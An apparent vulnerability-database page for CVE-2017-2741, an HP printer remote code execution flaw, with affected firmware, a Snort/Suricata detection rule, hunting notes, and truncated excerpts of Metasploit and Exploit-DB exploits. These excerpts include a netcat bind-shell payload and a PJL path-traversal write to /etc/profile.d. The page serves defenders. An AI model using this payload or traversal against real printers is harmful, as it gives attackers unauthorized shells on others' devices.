CVE-2017-2741
published 2018-01-23CVE-2017-2741: A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability…
PriorityP279critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
84.89%
99.7th percentile
A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | d3q15a_firmware | < 1708d | 1708d |
| hp | d3q15b_firmware | < 1708d | 1708d |
| hp | d3q15d_firmware | < 1708d | 1708d |
| hp | d3q16a_firmware | < 1708d | 1708d |
| hp | d3q16b_firmware | < 1708d | 1708d |
| hp | d3q16c_firmware | < 1708d | 1708d |
| hp | d3q16d_firmware | < 1708d | 1708d |
| hp | d3q17a_firmware | < 1708d | 1708d |
| hp | d3q17c_firmware | < 1708d | 1708d |
| hp | d3q17d_firmware | < 1708d | 1708d |
| hp | d3q19a_firmware | < 1708d | 1708d |
| hp | d3q19d_firmware | < 1708d | 1708d |
| hp | d3q20a_firmware | < 1708d | 1708d |
| hp | d3q20b_firmware | < 1708d | 1708d |
| hp | d3q20c_firmware | < 1708d | 1708d |
| hp | d3q20d_firmware | < 1708d | 1708d |
| hp | d3q21a_firmware | < 1708d | 1708d |
| hp | d3q21c_firmware | < 1708d | 1708d |
| hp | d3q21d_firmware | < 1708d | 1708d |
| hp | d9l20a_firmware | < 1708d | 1708d |
| hp | d9l21a_firmware | < 1708d | 1708d |
| hp | d9l63a_firmware | < 1708d | 1708d |
| hp | d9l64a_firmware | < 1708d | 1708d |
| hp | j3p68a_firmware | < 1708d | 1708d |
| hp | j6u55a_firmware | < 1708d | 1708d |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert tcp any any -> $HOME_NET 9100 (msg:"ET EXPLOIT HP Printer Attempted Path Traversal via PJL"; flow:established,to_server; content:"@PJL FS"; depth:7; content:"NAME="; distance:0; pcre:"/^\s*[\x22\x27][^\x22\x27]{0,128}\x2e\x2e/Ri"; reference:url,www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution; reference:cve,2017-2741; classtype:attempted-admin; sid:2024404; rev:5; metadata:created_at 2017_06_16, cve CVE_2017_2741, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)- →Detect PJL path traversal attempts by matching '@PJL FS' followed by 'NAME=' containing '..' sequences on port 9100 (JetDirect/PJL port).
- →The exploit writes a shell script to /etc/profile.d/ via PJL FSDOWNLOAD using a path traversal string '0:/../../rw/var/etc/profile.d/' to achieve persistence on reboot. ↗
- →After writing the payload, the attacker triggers a printer reboot via SNMP SET on OID 1.3.6.1.2.1.43.5.1.1.3.1 (prtGeneralReset) with value 4 (powerCycleReset). Monitor SNMP SET requests to this OID. ↗
- →A successful exploit may leave an unauthenticated telnetd service running as a side effect; monitor for unexpected telnetd processes or open telnet ports on printer devices. ↗
- →The default Metasploit payload for this exploit is 'cmd/unix/bind_busybox_telnetd', which binds a telnetd listener on the printer. Hunt for unexpected inbound connections to printer IPs post-reboot. ↗
- →The Metasploit module drops a randomly named .sh script (8 random alpha chars) into /etc/profile.d/ and removes it after execution; look for transient .sh files in /etc/profile.d/ on HP printer filesystems. ↗
- ·The SNMP community string used in the PoC is 'public' (default). Printers with non-default SNMP community strings will not be restartable via this method, potentially stalling the exploit at the reboot step. ↗
- ·The Metasploit module uses a WfsDelay of 180 seconds to wait for the printer to reboot and execute the payload; detection/response windows should account for this delay between exploit delivery and callback. ↗
- ·The exploit requires the PJL port (default 9100) to be reachable and SNMP (default UDP 161) to be accessible from the attacker; network segmentation of printer management ports mitigates exposure. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET EXPLOIT HP Printer Attempted Path Traversal via PJL
suricata·2017-06-16
CVE-2017-2741 ET EXPLOIT HP Printer Attempted Path Traversal via PJL
ET EXPLOIT HP Printer Attempted Path Traversal via PJL
Rule: alert tcp any any -> $HOME_NET 9100 (msg:"ET EXPLOIT HP Printer Attempted Path Traversal via PJL"; flow:established,to_server; content:"@PJL FS"; depth:7; content:"NAME="; distance:0; pcre:"/^\s*[\x22\x27][^\x22\x27]{0,128}\x2e\x2e/Ri"; reference:url,www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution; reference:cve,2017-2741; classtype:attempted-admin; sid:2024404; rev:5; metadata:created_at 2017_06_16, cve CVE_2017_2741, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_D
Exploit-DB
HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)
exploitdb·2018-08-27
CVE-2017-2741 HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)
HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "rex/proto/pjl"
class MetasploitModule 'HP Jetdirect Path Traversal Arbitrary Code Execution',
'Description' => %q{
The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
is restarted using SNMP. Impacted printers:
HP PageWide Managed MFP P57750dw
HP PageWide Managed P55250dw
HP PageWide Pro MFP 577z
HP PageWide Pro 552dw
HP PageWide Pro MFP 577dw
HP PageWide Pro MFP 477dw
HP PageWide Pro 452dw
HP PageWide Pro MFP 477dn
HP PageWide Pro 452dn
HP PageWide MF
Exploit-DB
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
exploitdb·2017-06-14
CVE-2017-2741 HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
---
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##
import socket
import sys
from easysnmp import snmp_set
profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
'\tmkfifo /tmp/pwned\n'
'\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
'fi\n')
if len(sys.argv) != 3:
print '\nUsage:upload.py [ip] [port]\n'
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' %
Metasploit
HP Jetdirect Path Traversal Arbitrary Code Execution
metasploit
HP Jetdirect Path Traversal Arbitrary Code Execution
HP Jetdirect Path Traversal Arbitrary Code Execution
The module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. Impacted printers: HP PageWide Managed MFP P57750dw HP PageWide Managed P55250dw HP PageWide Pro MFP 577z HP PageWide Pro 552dw HP PageWide Pro MFP 577dw HP PageWide Pro MFP 477dw HP PageWide Pro 452dw HP PageWide Pro MFP 477dn HP PageWide Pro 452dn HP PageWide MFP 377dw HP PageWide 352dw HP OfficeJet Pro 8730 All-in-One Printer HP OfficeJet Pro 8740 All-in-One Printer HP OfficeJet Pro 8210 Printer HP OfficeJet Pro 8216 Printer HP OfficeJet Pro 8218 Printer Please read the module documentation regarding the possibility for leaving an unauthen
No writeups or analysis indexed.
2018-01-23
Published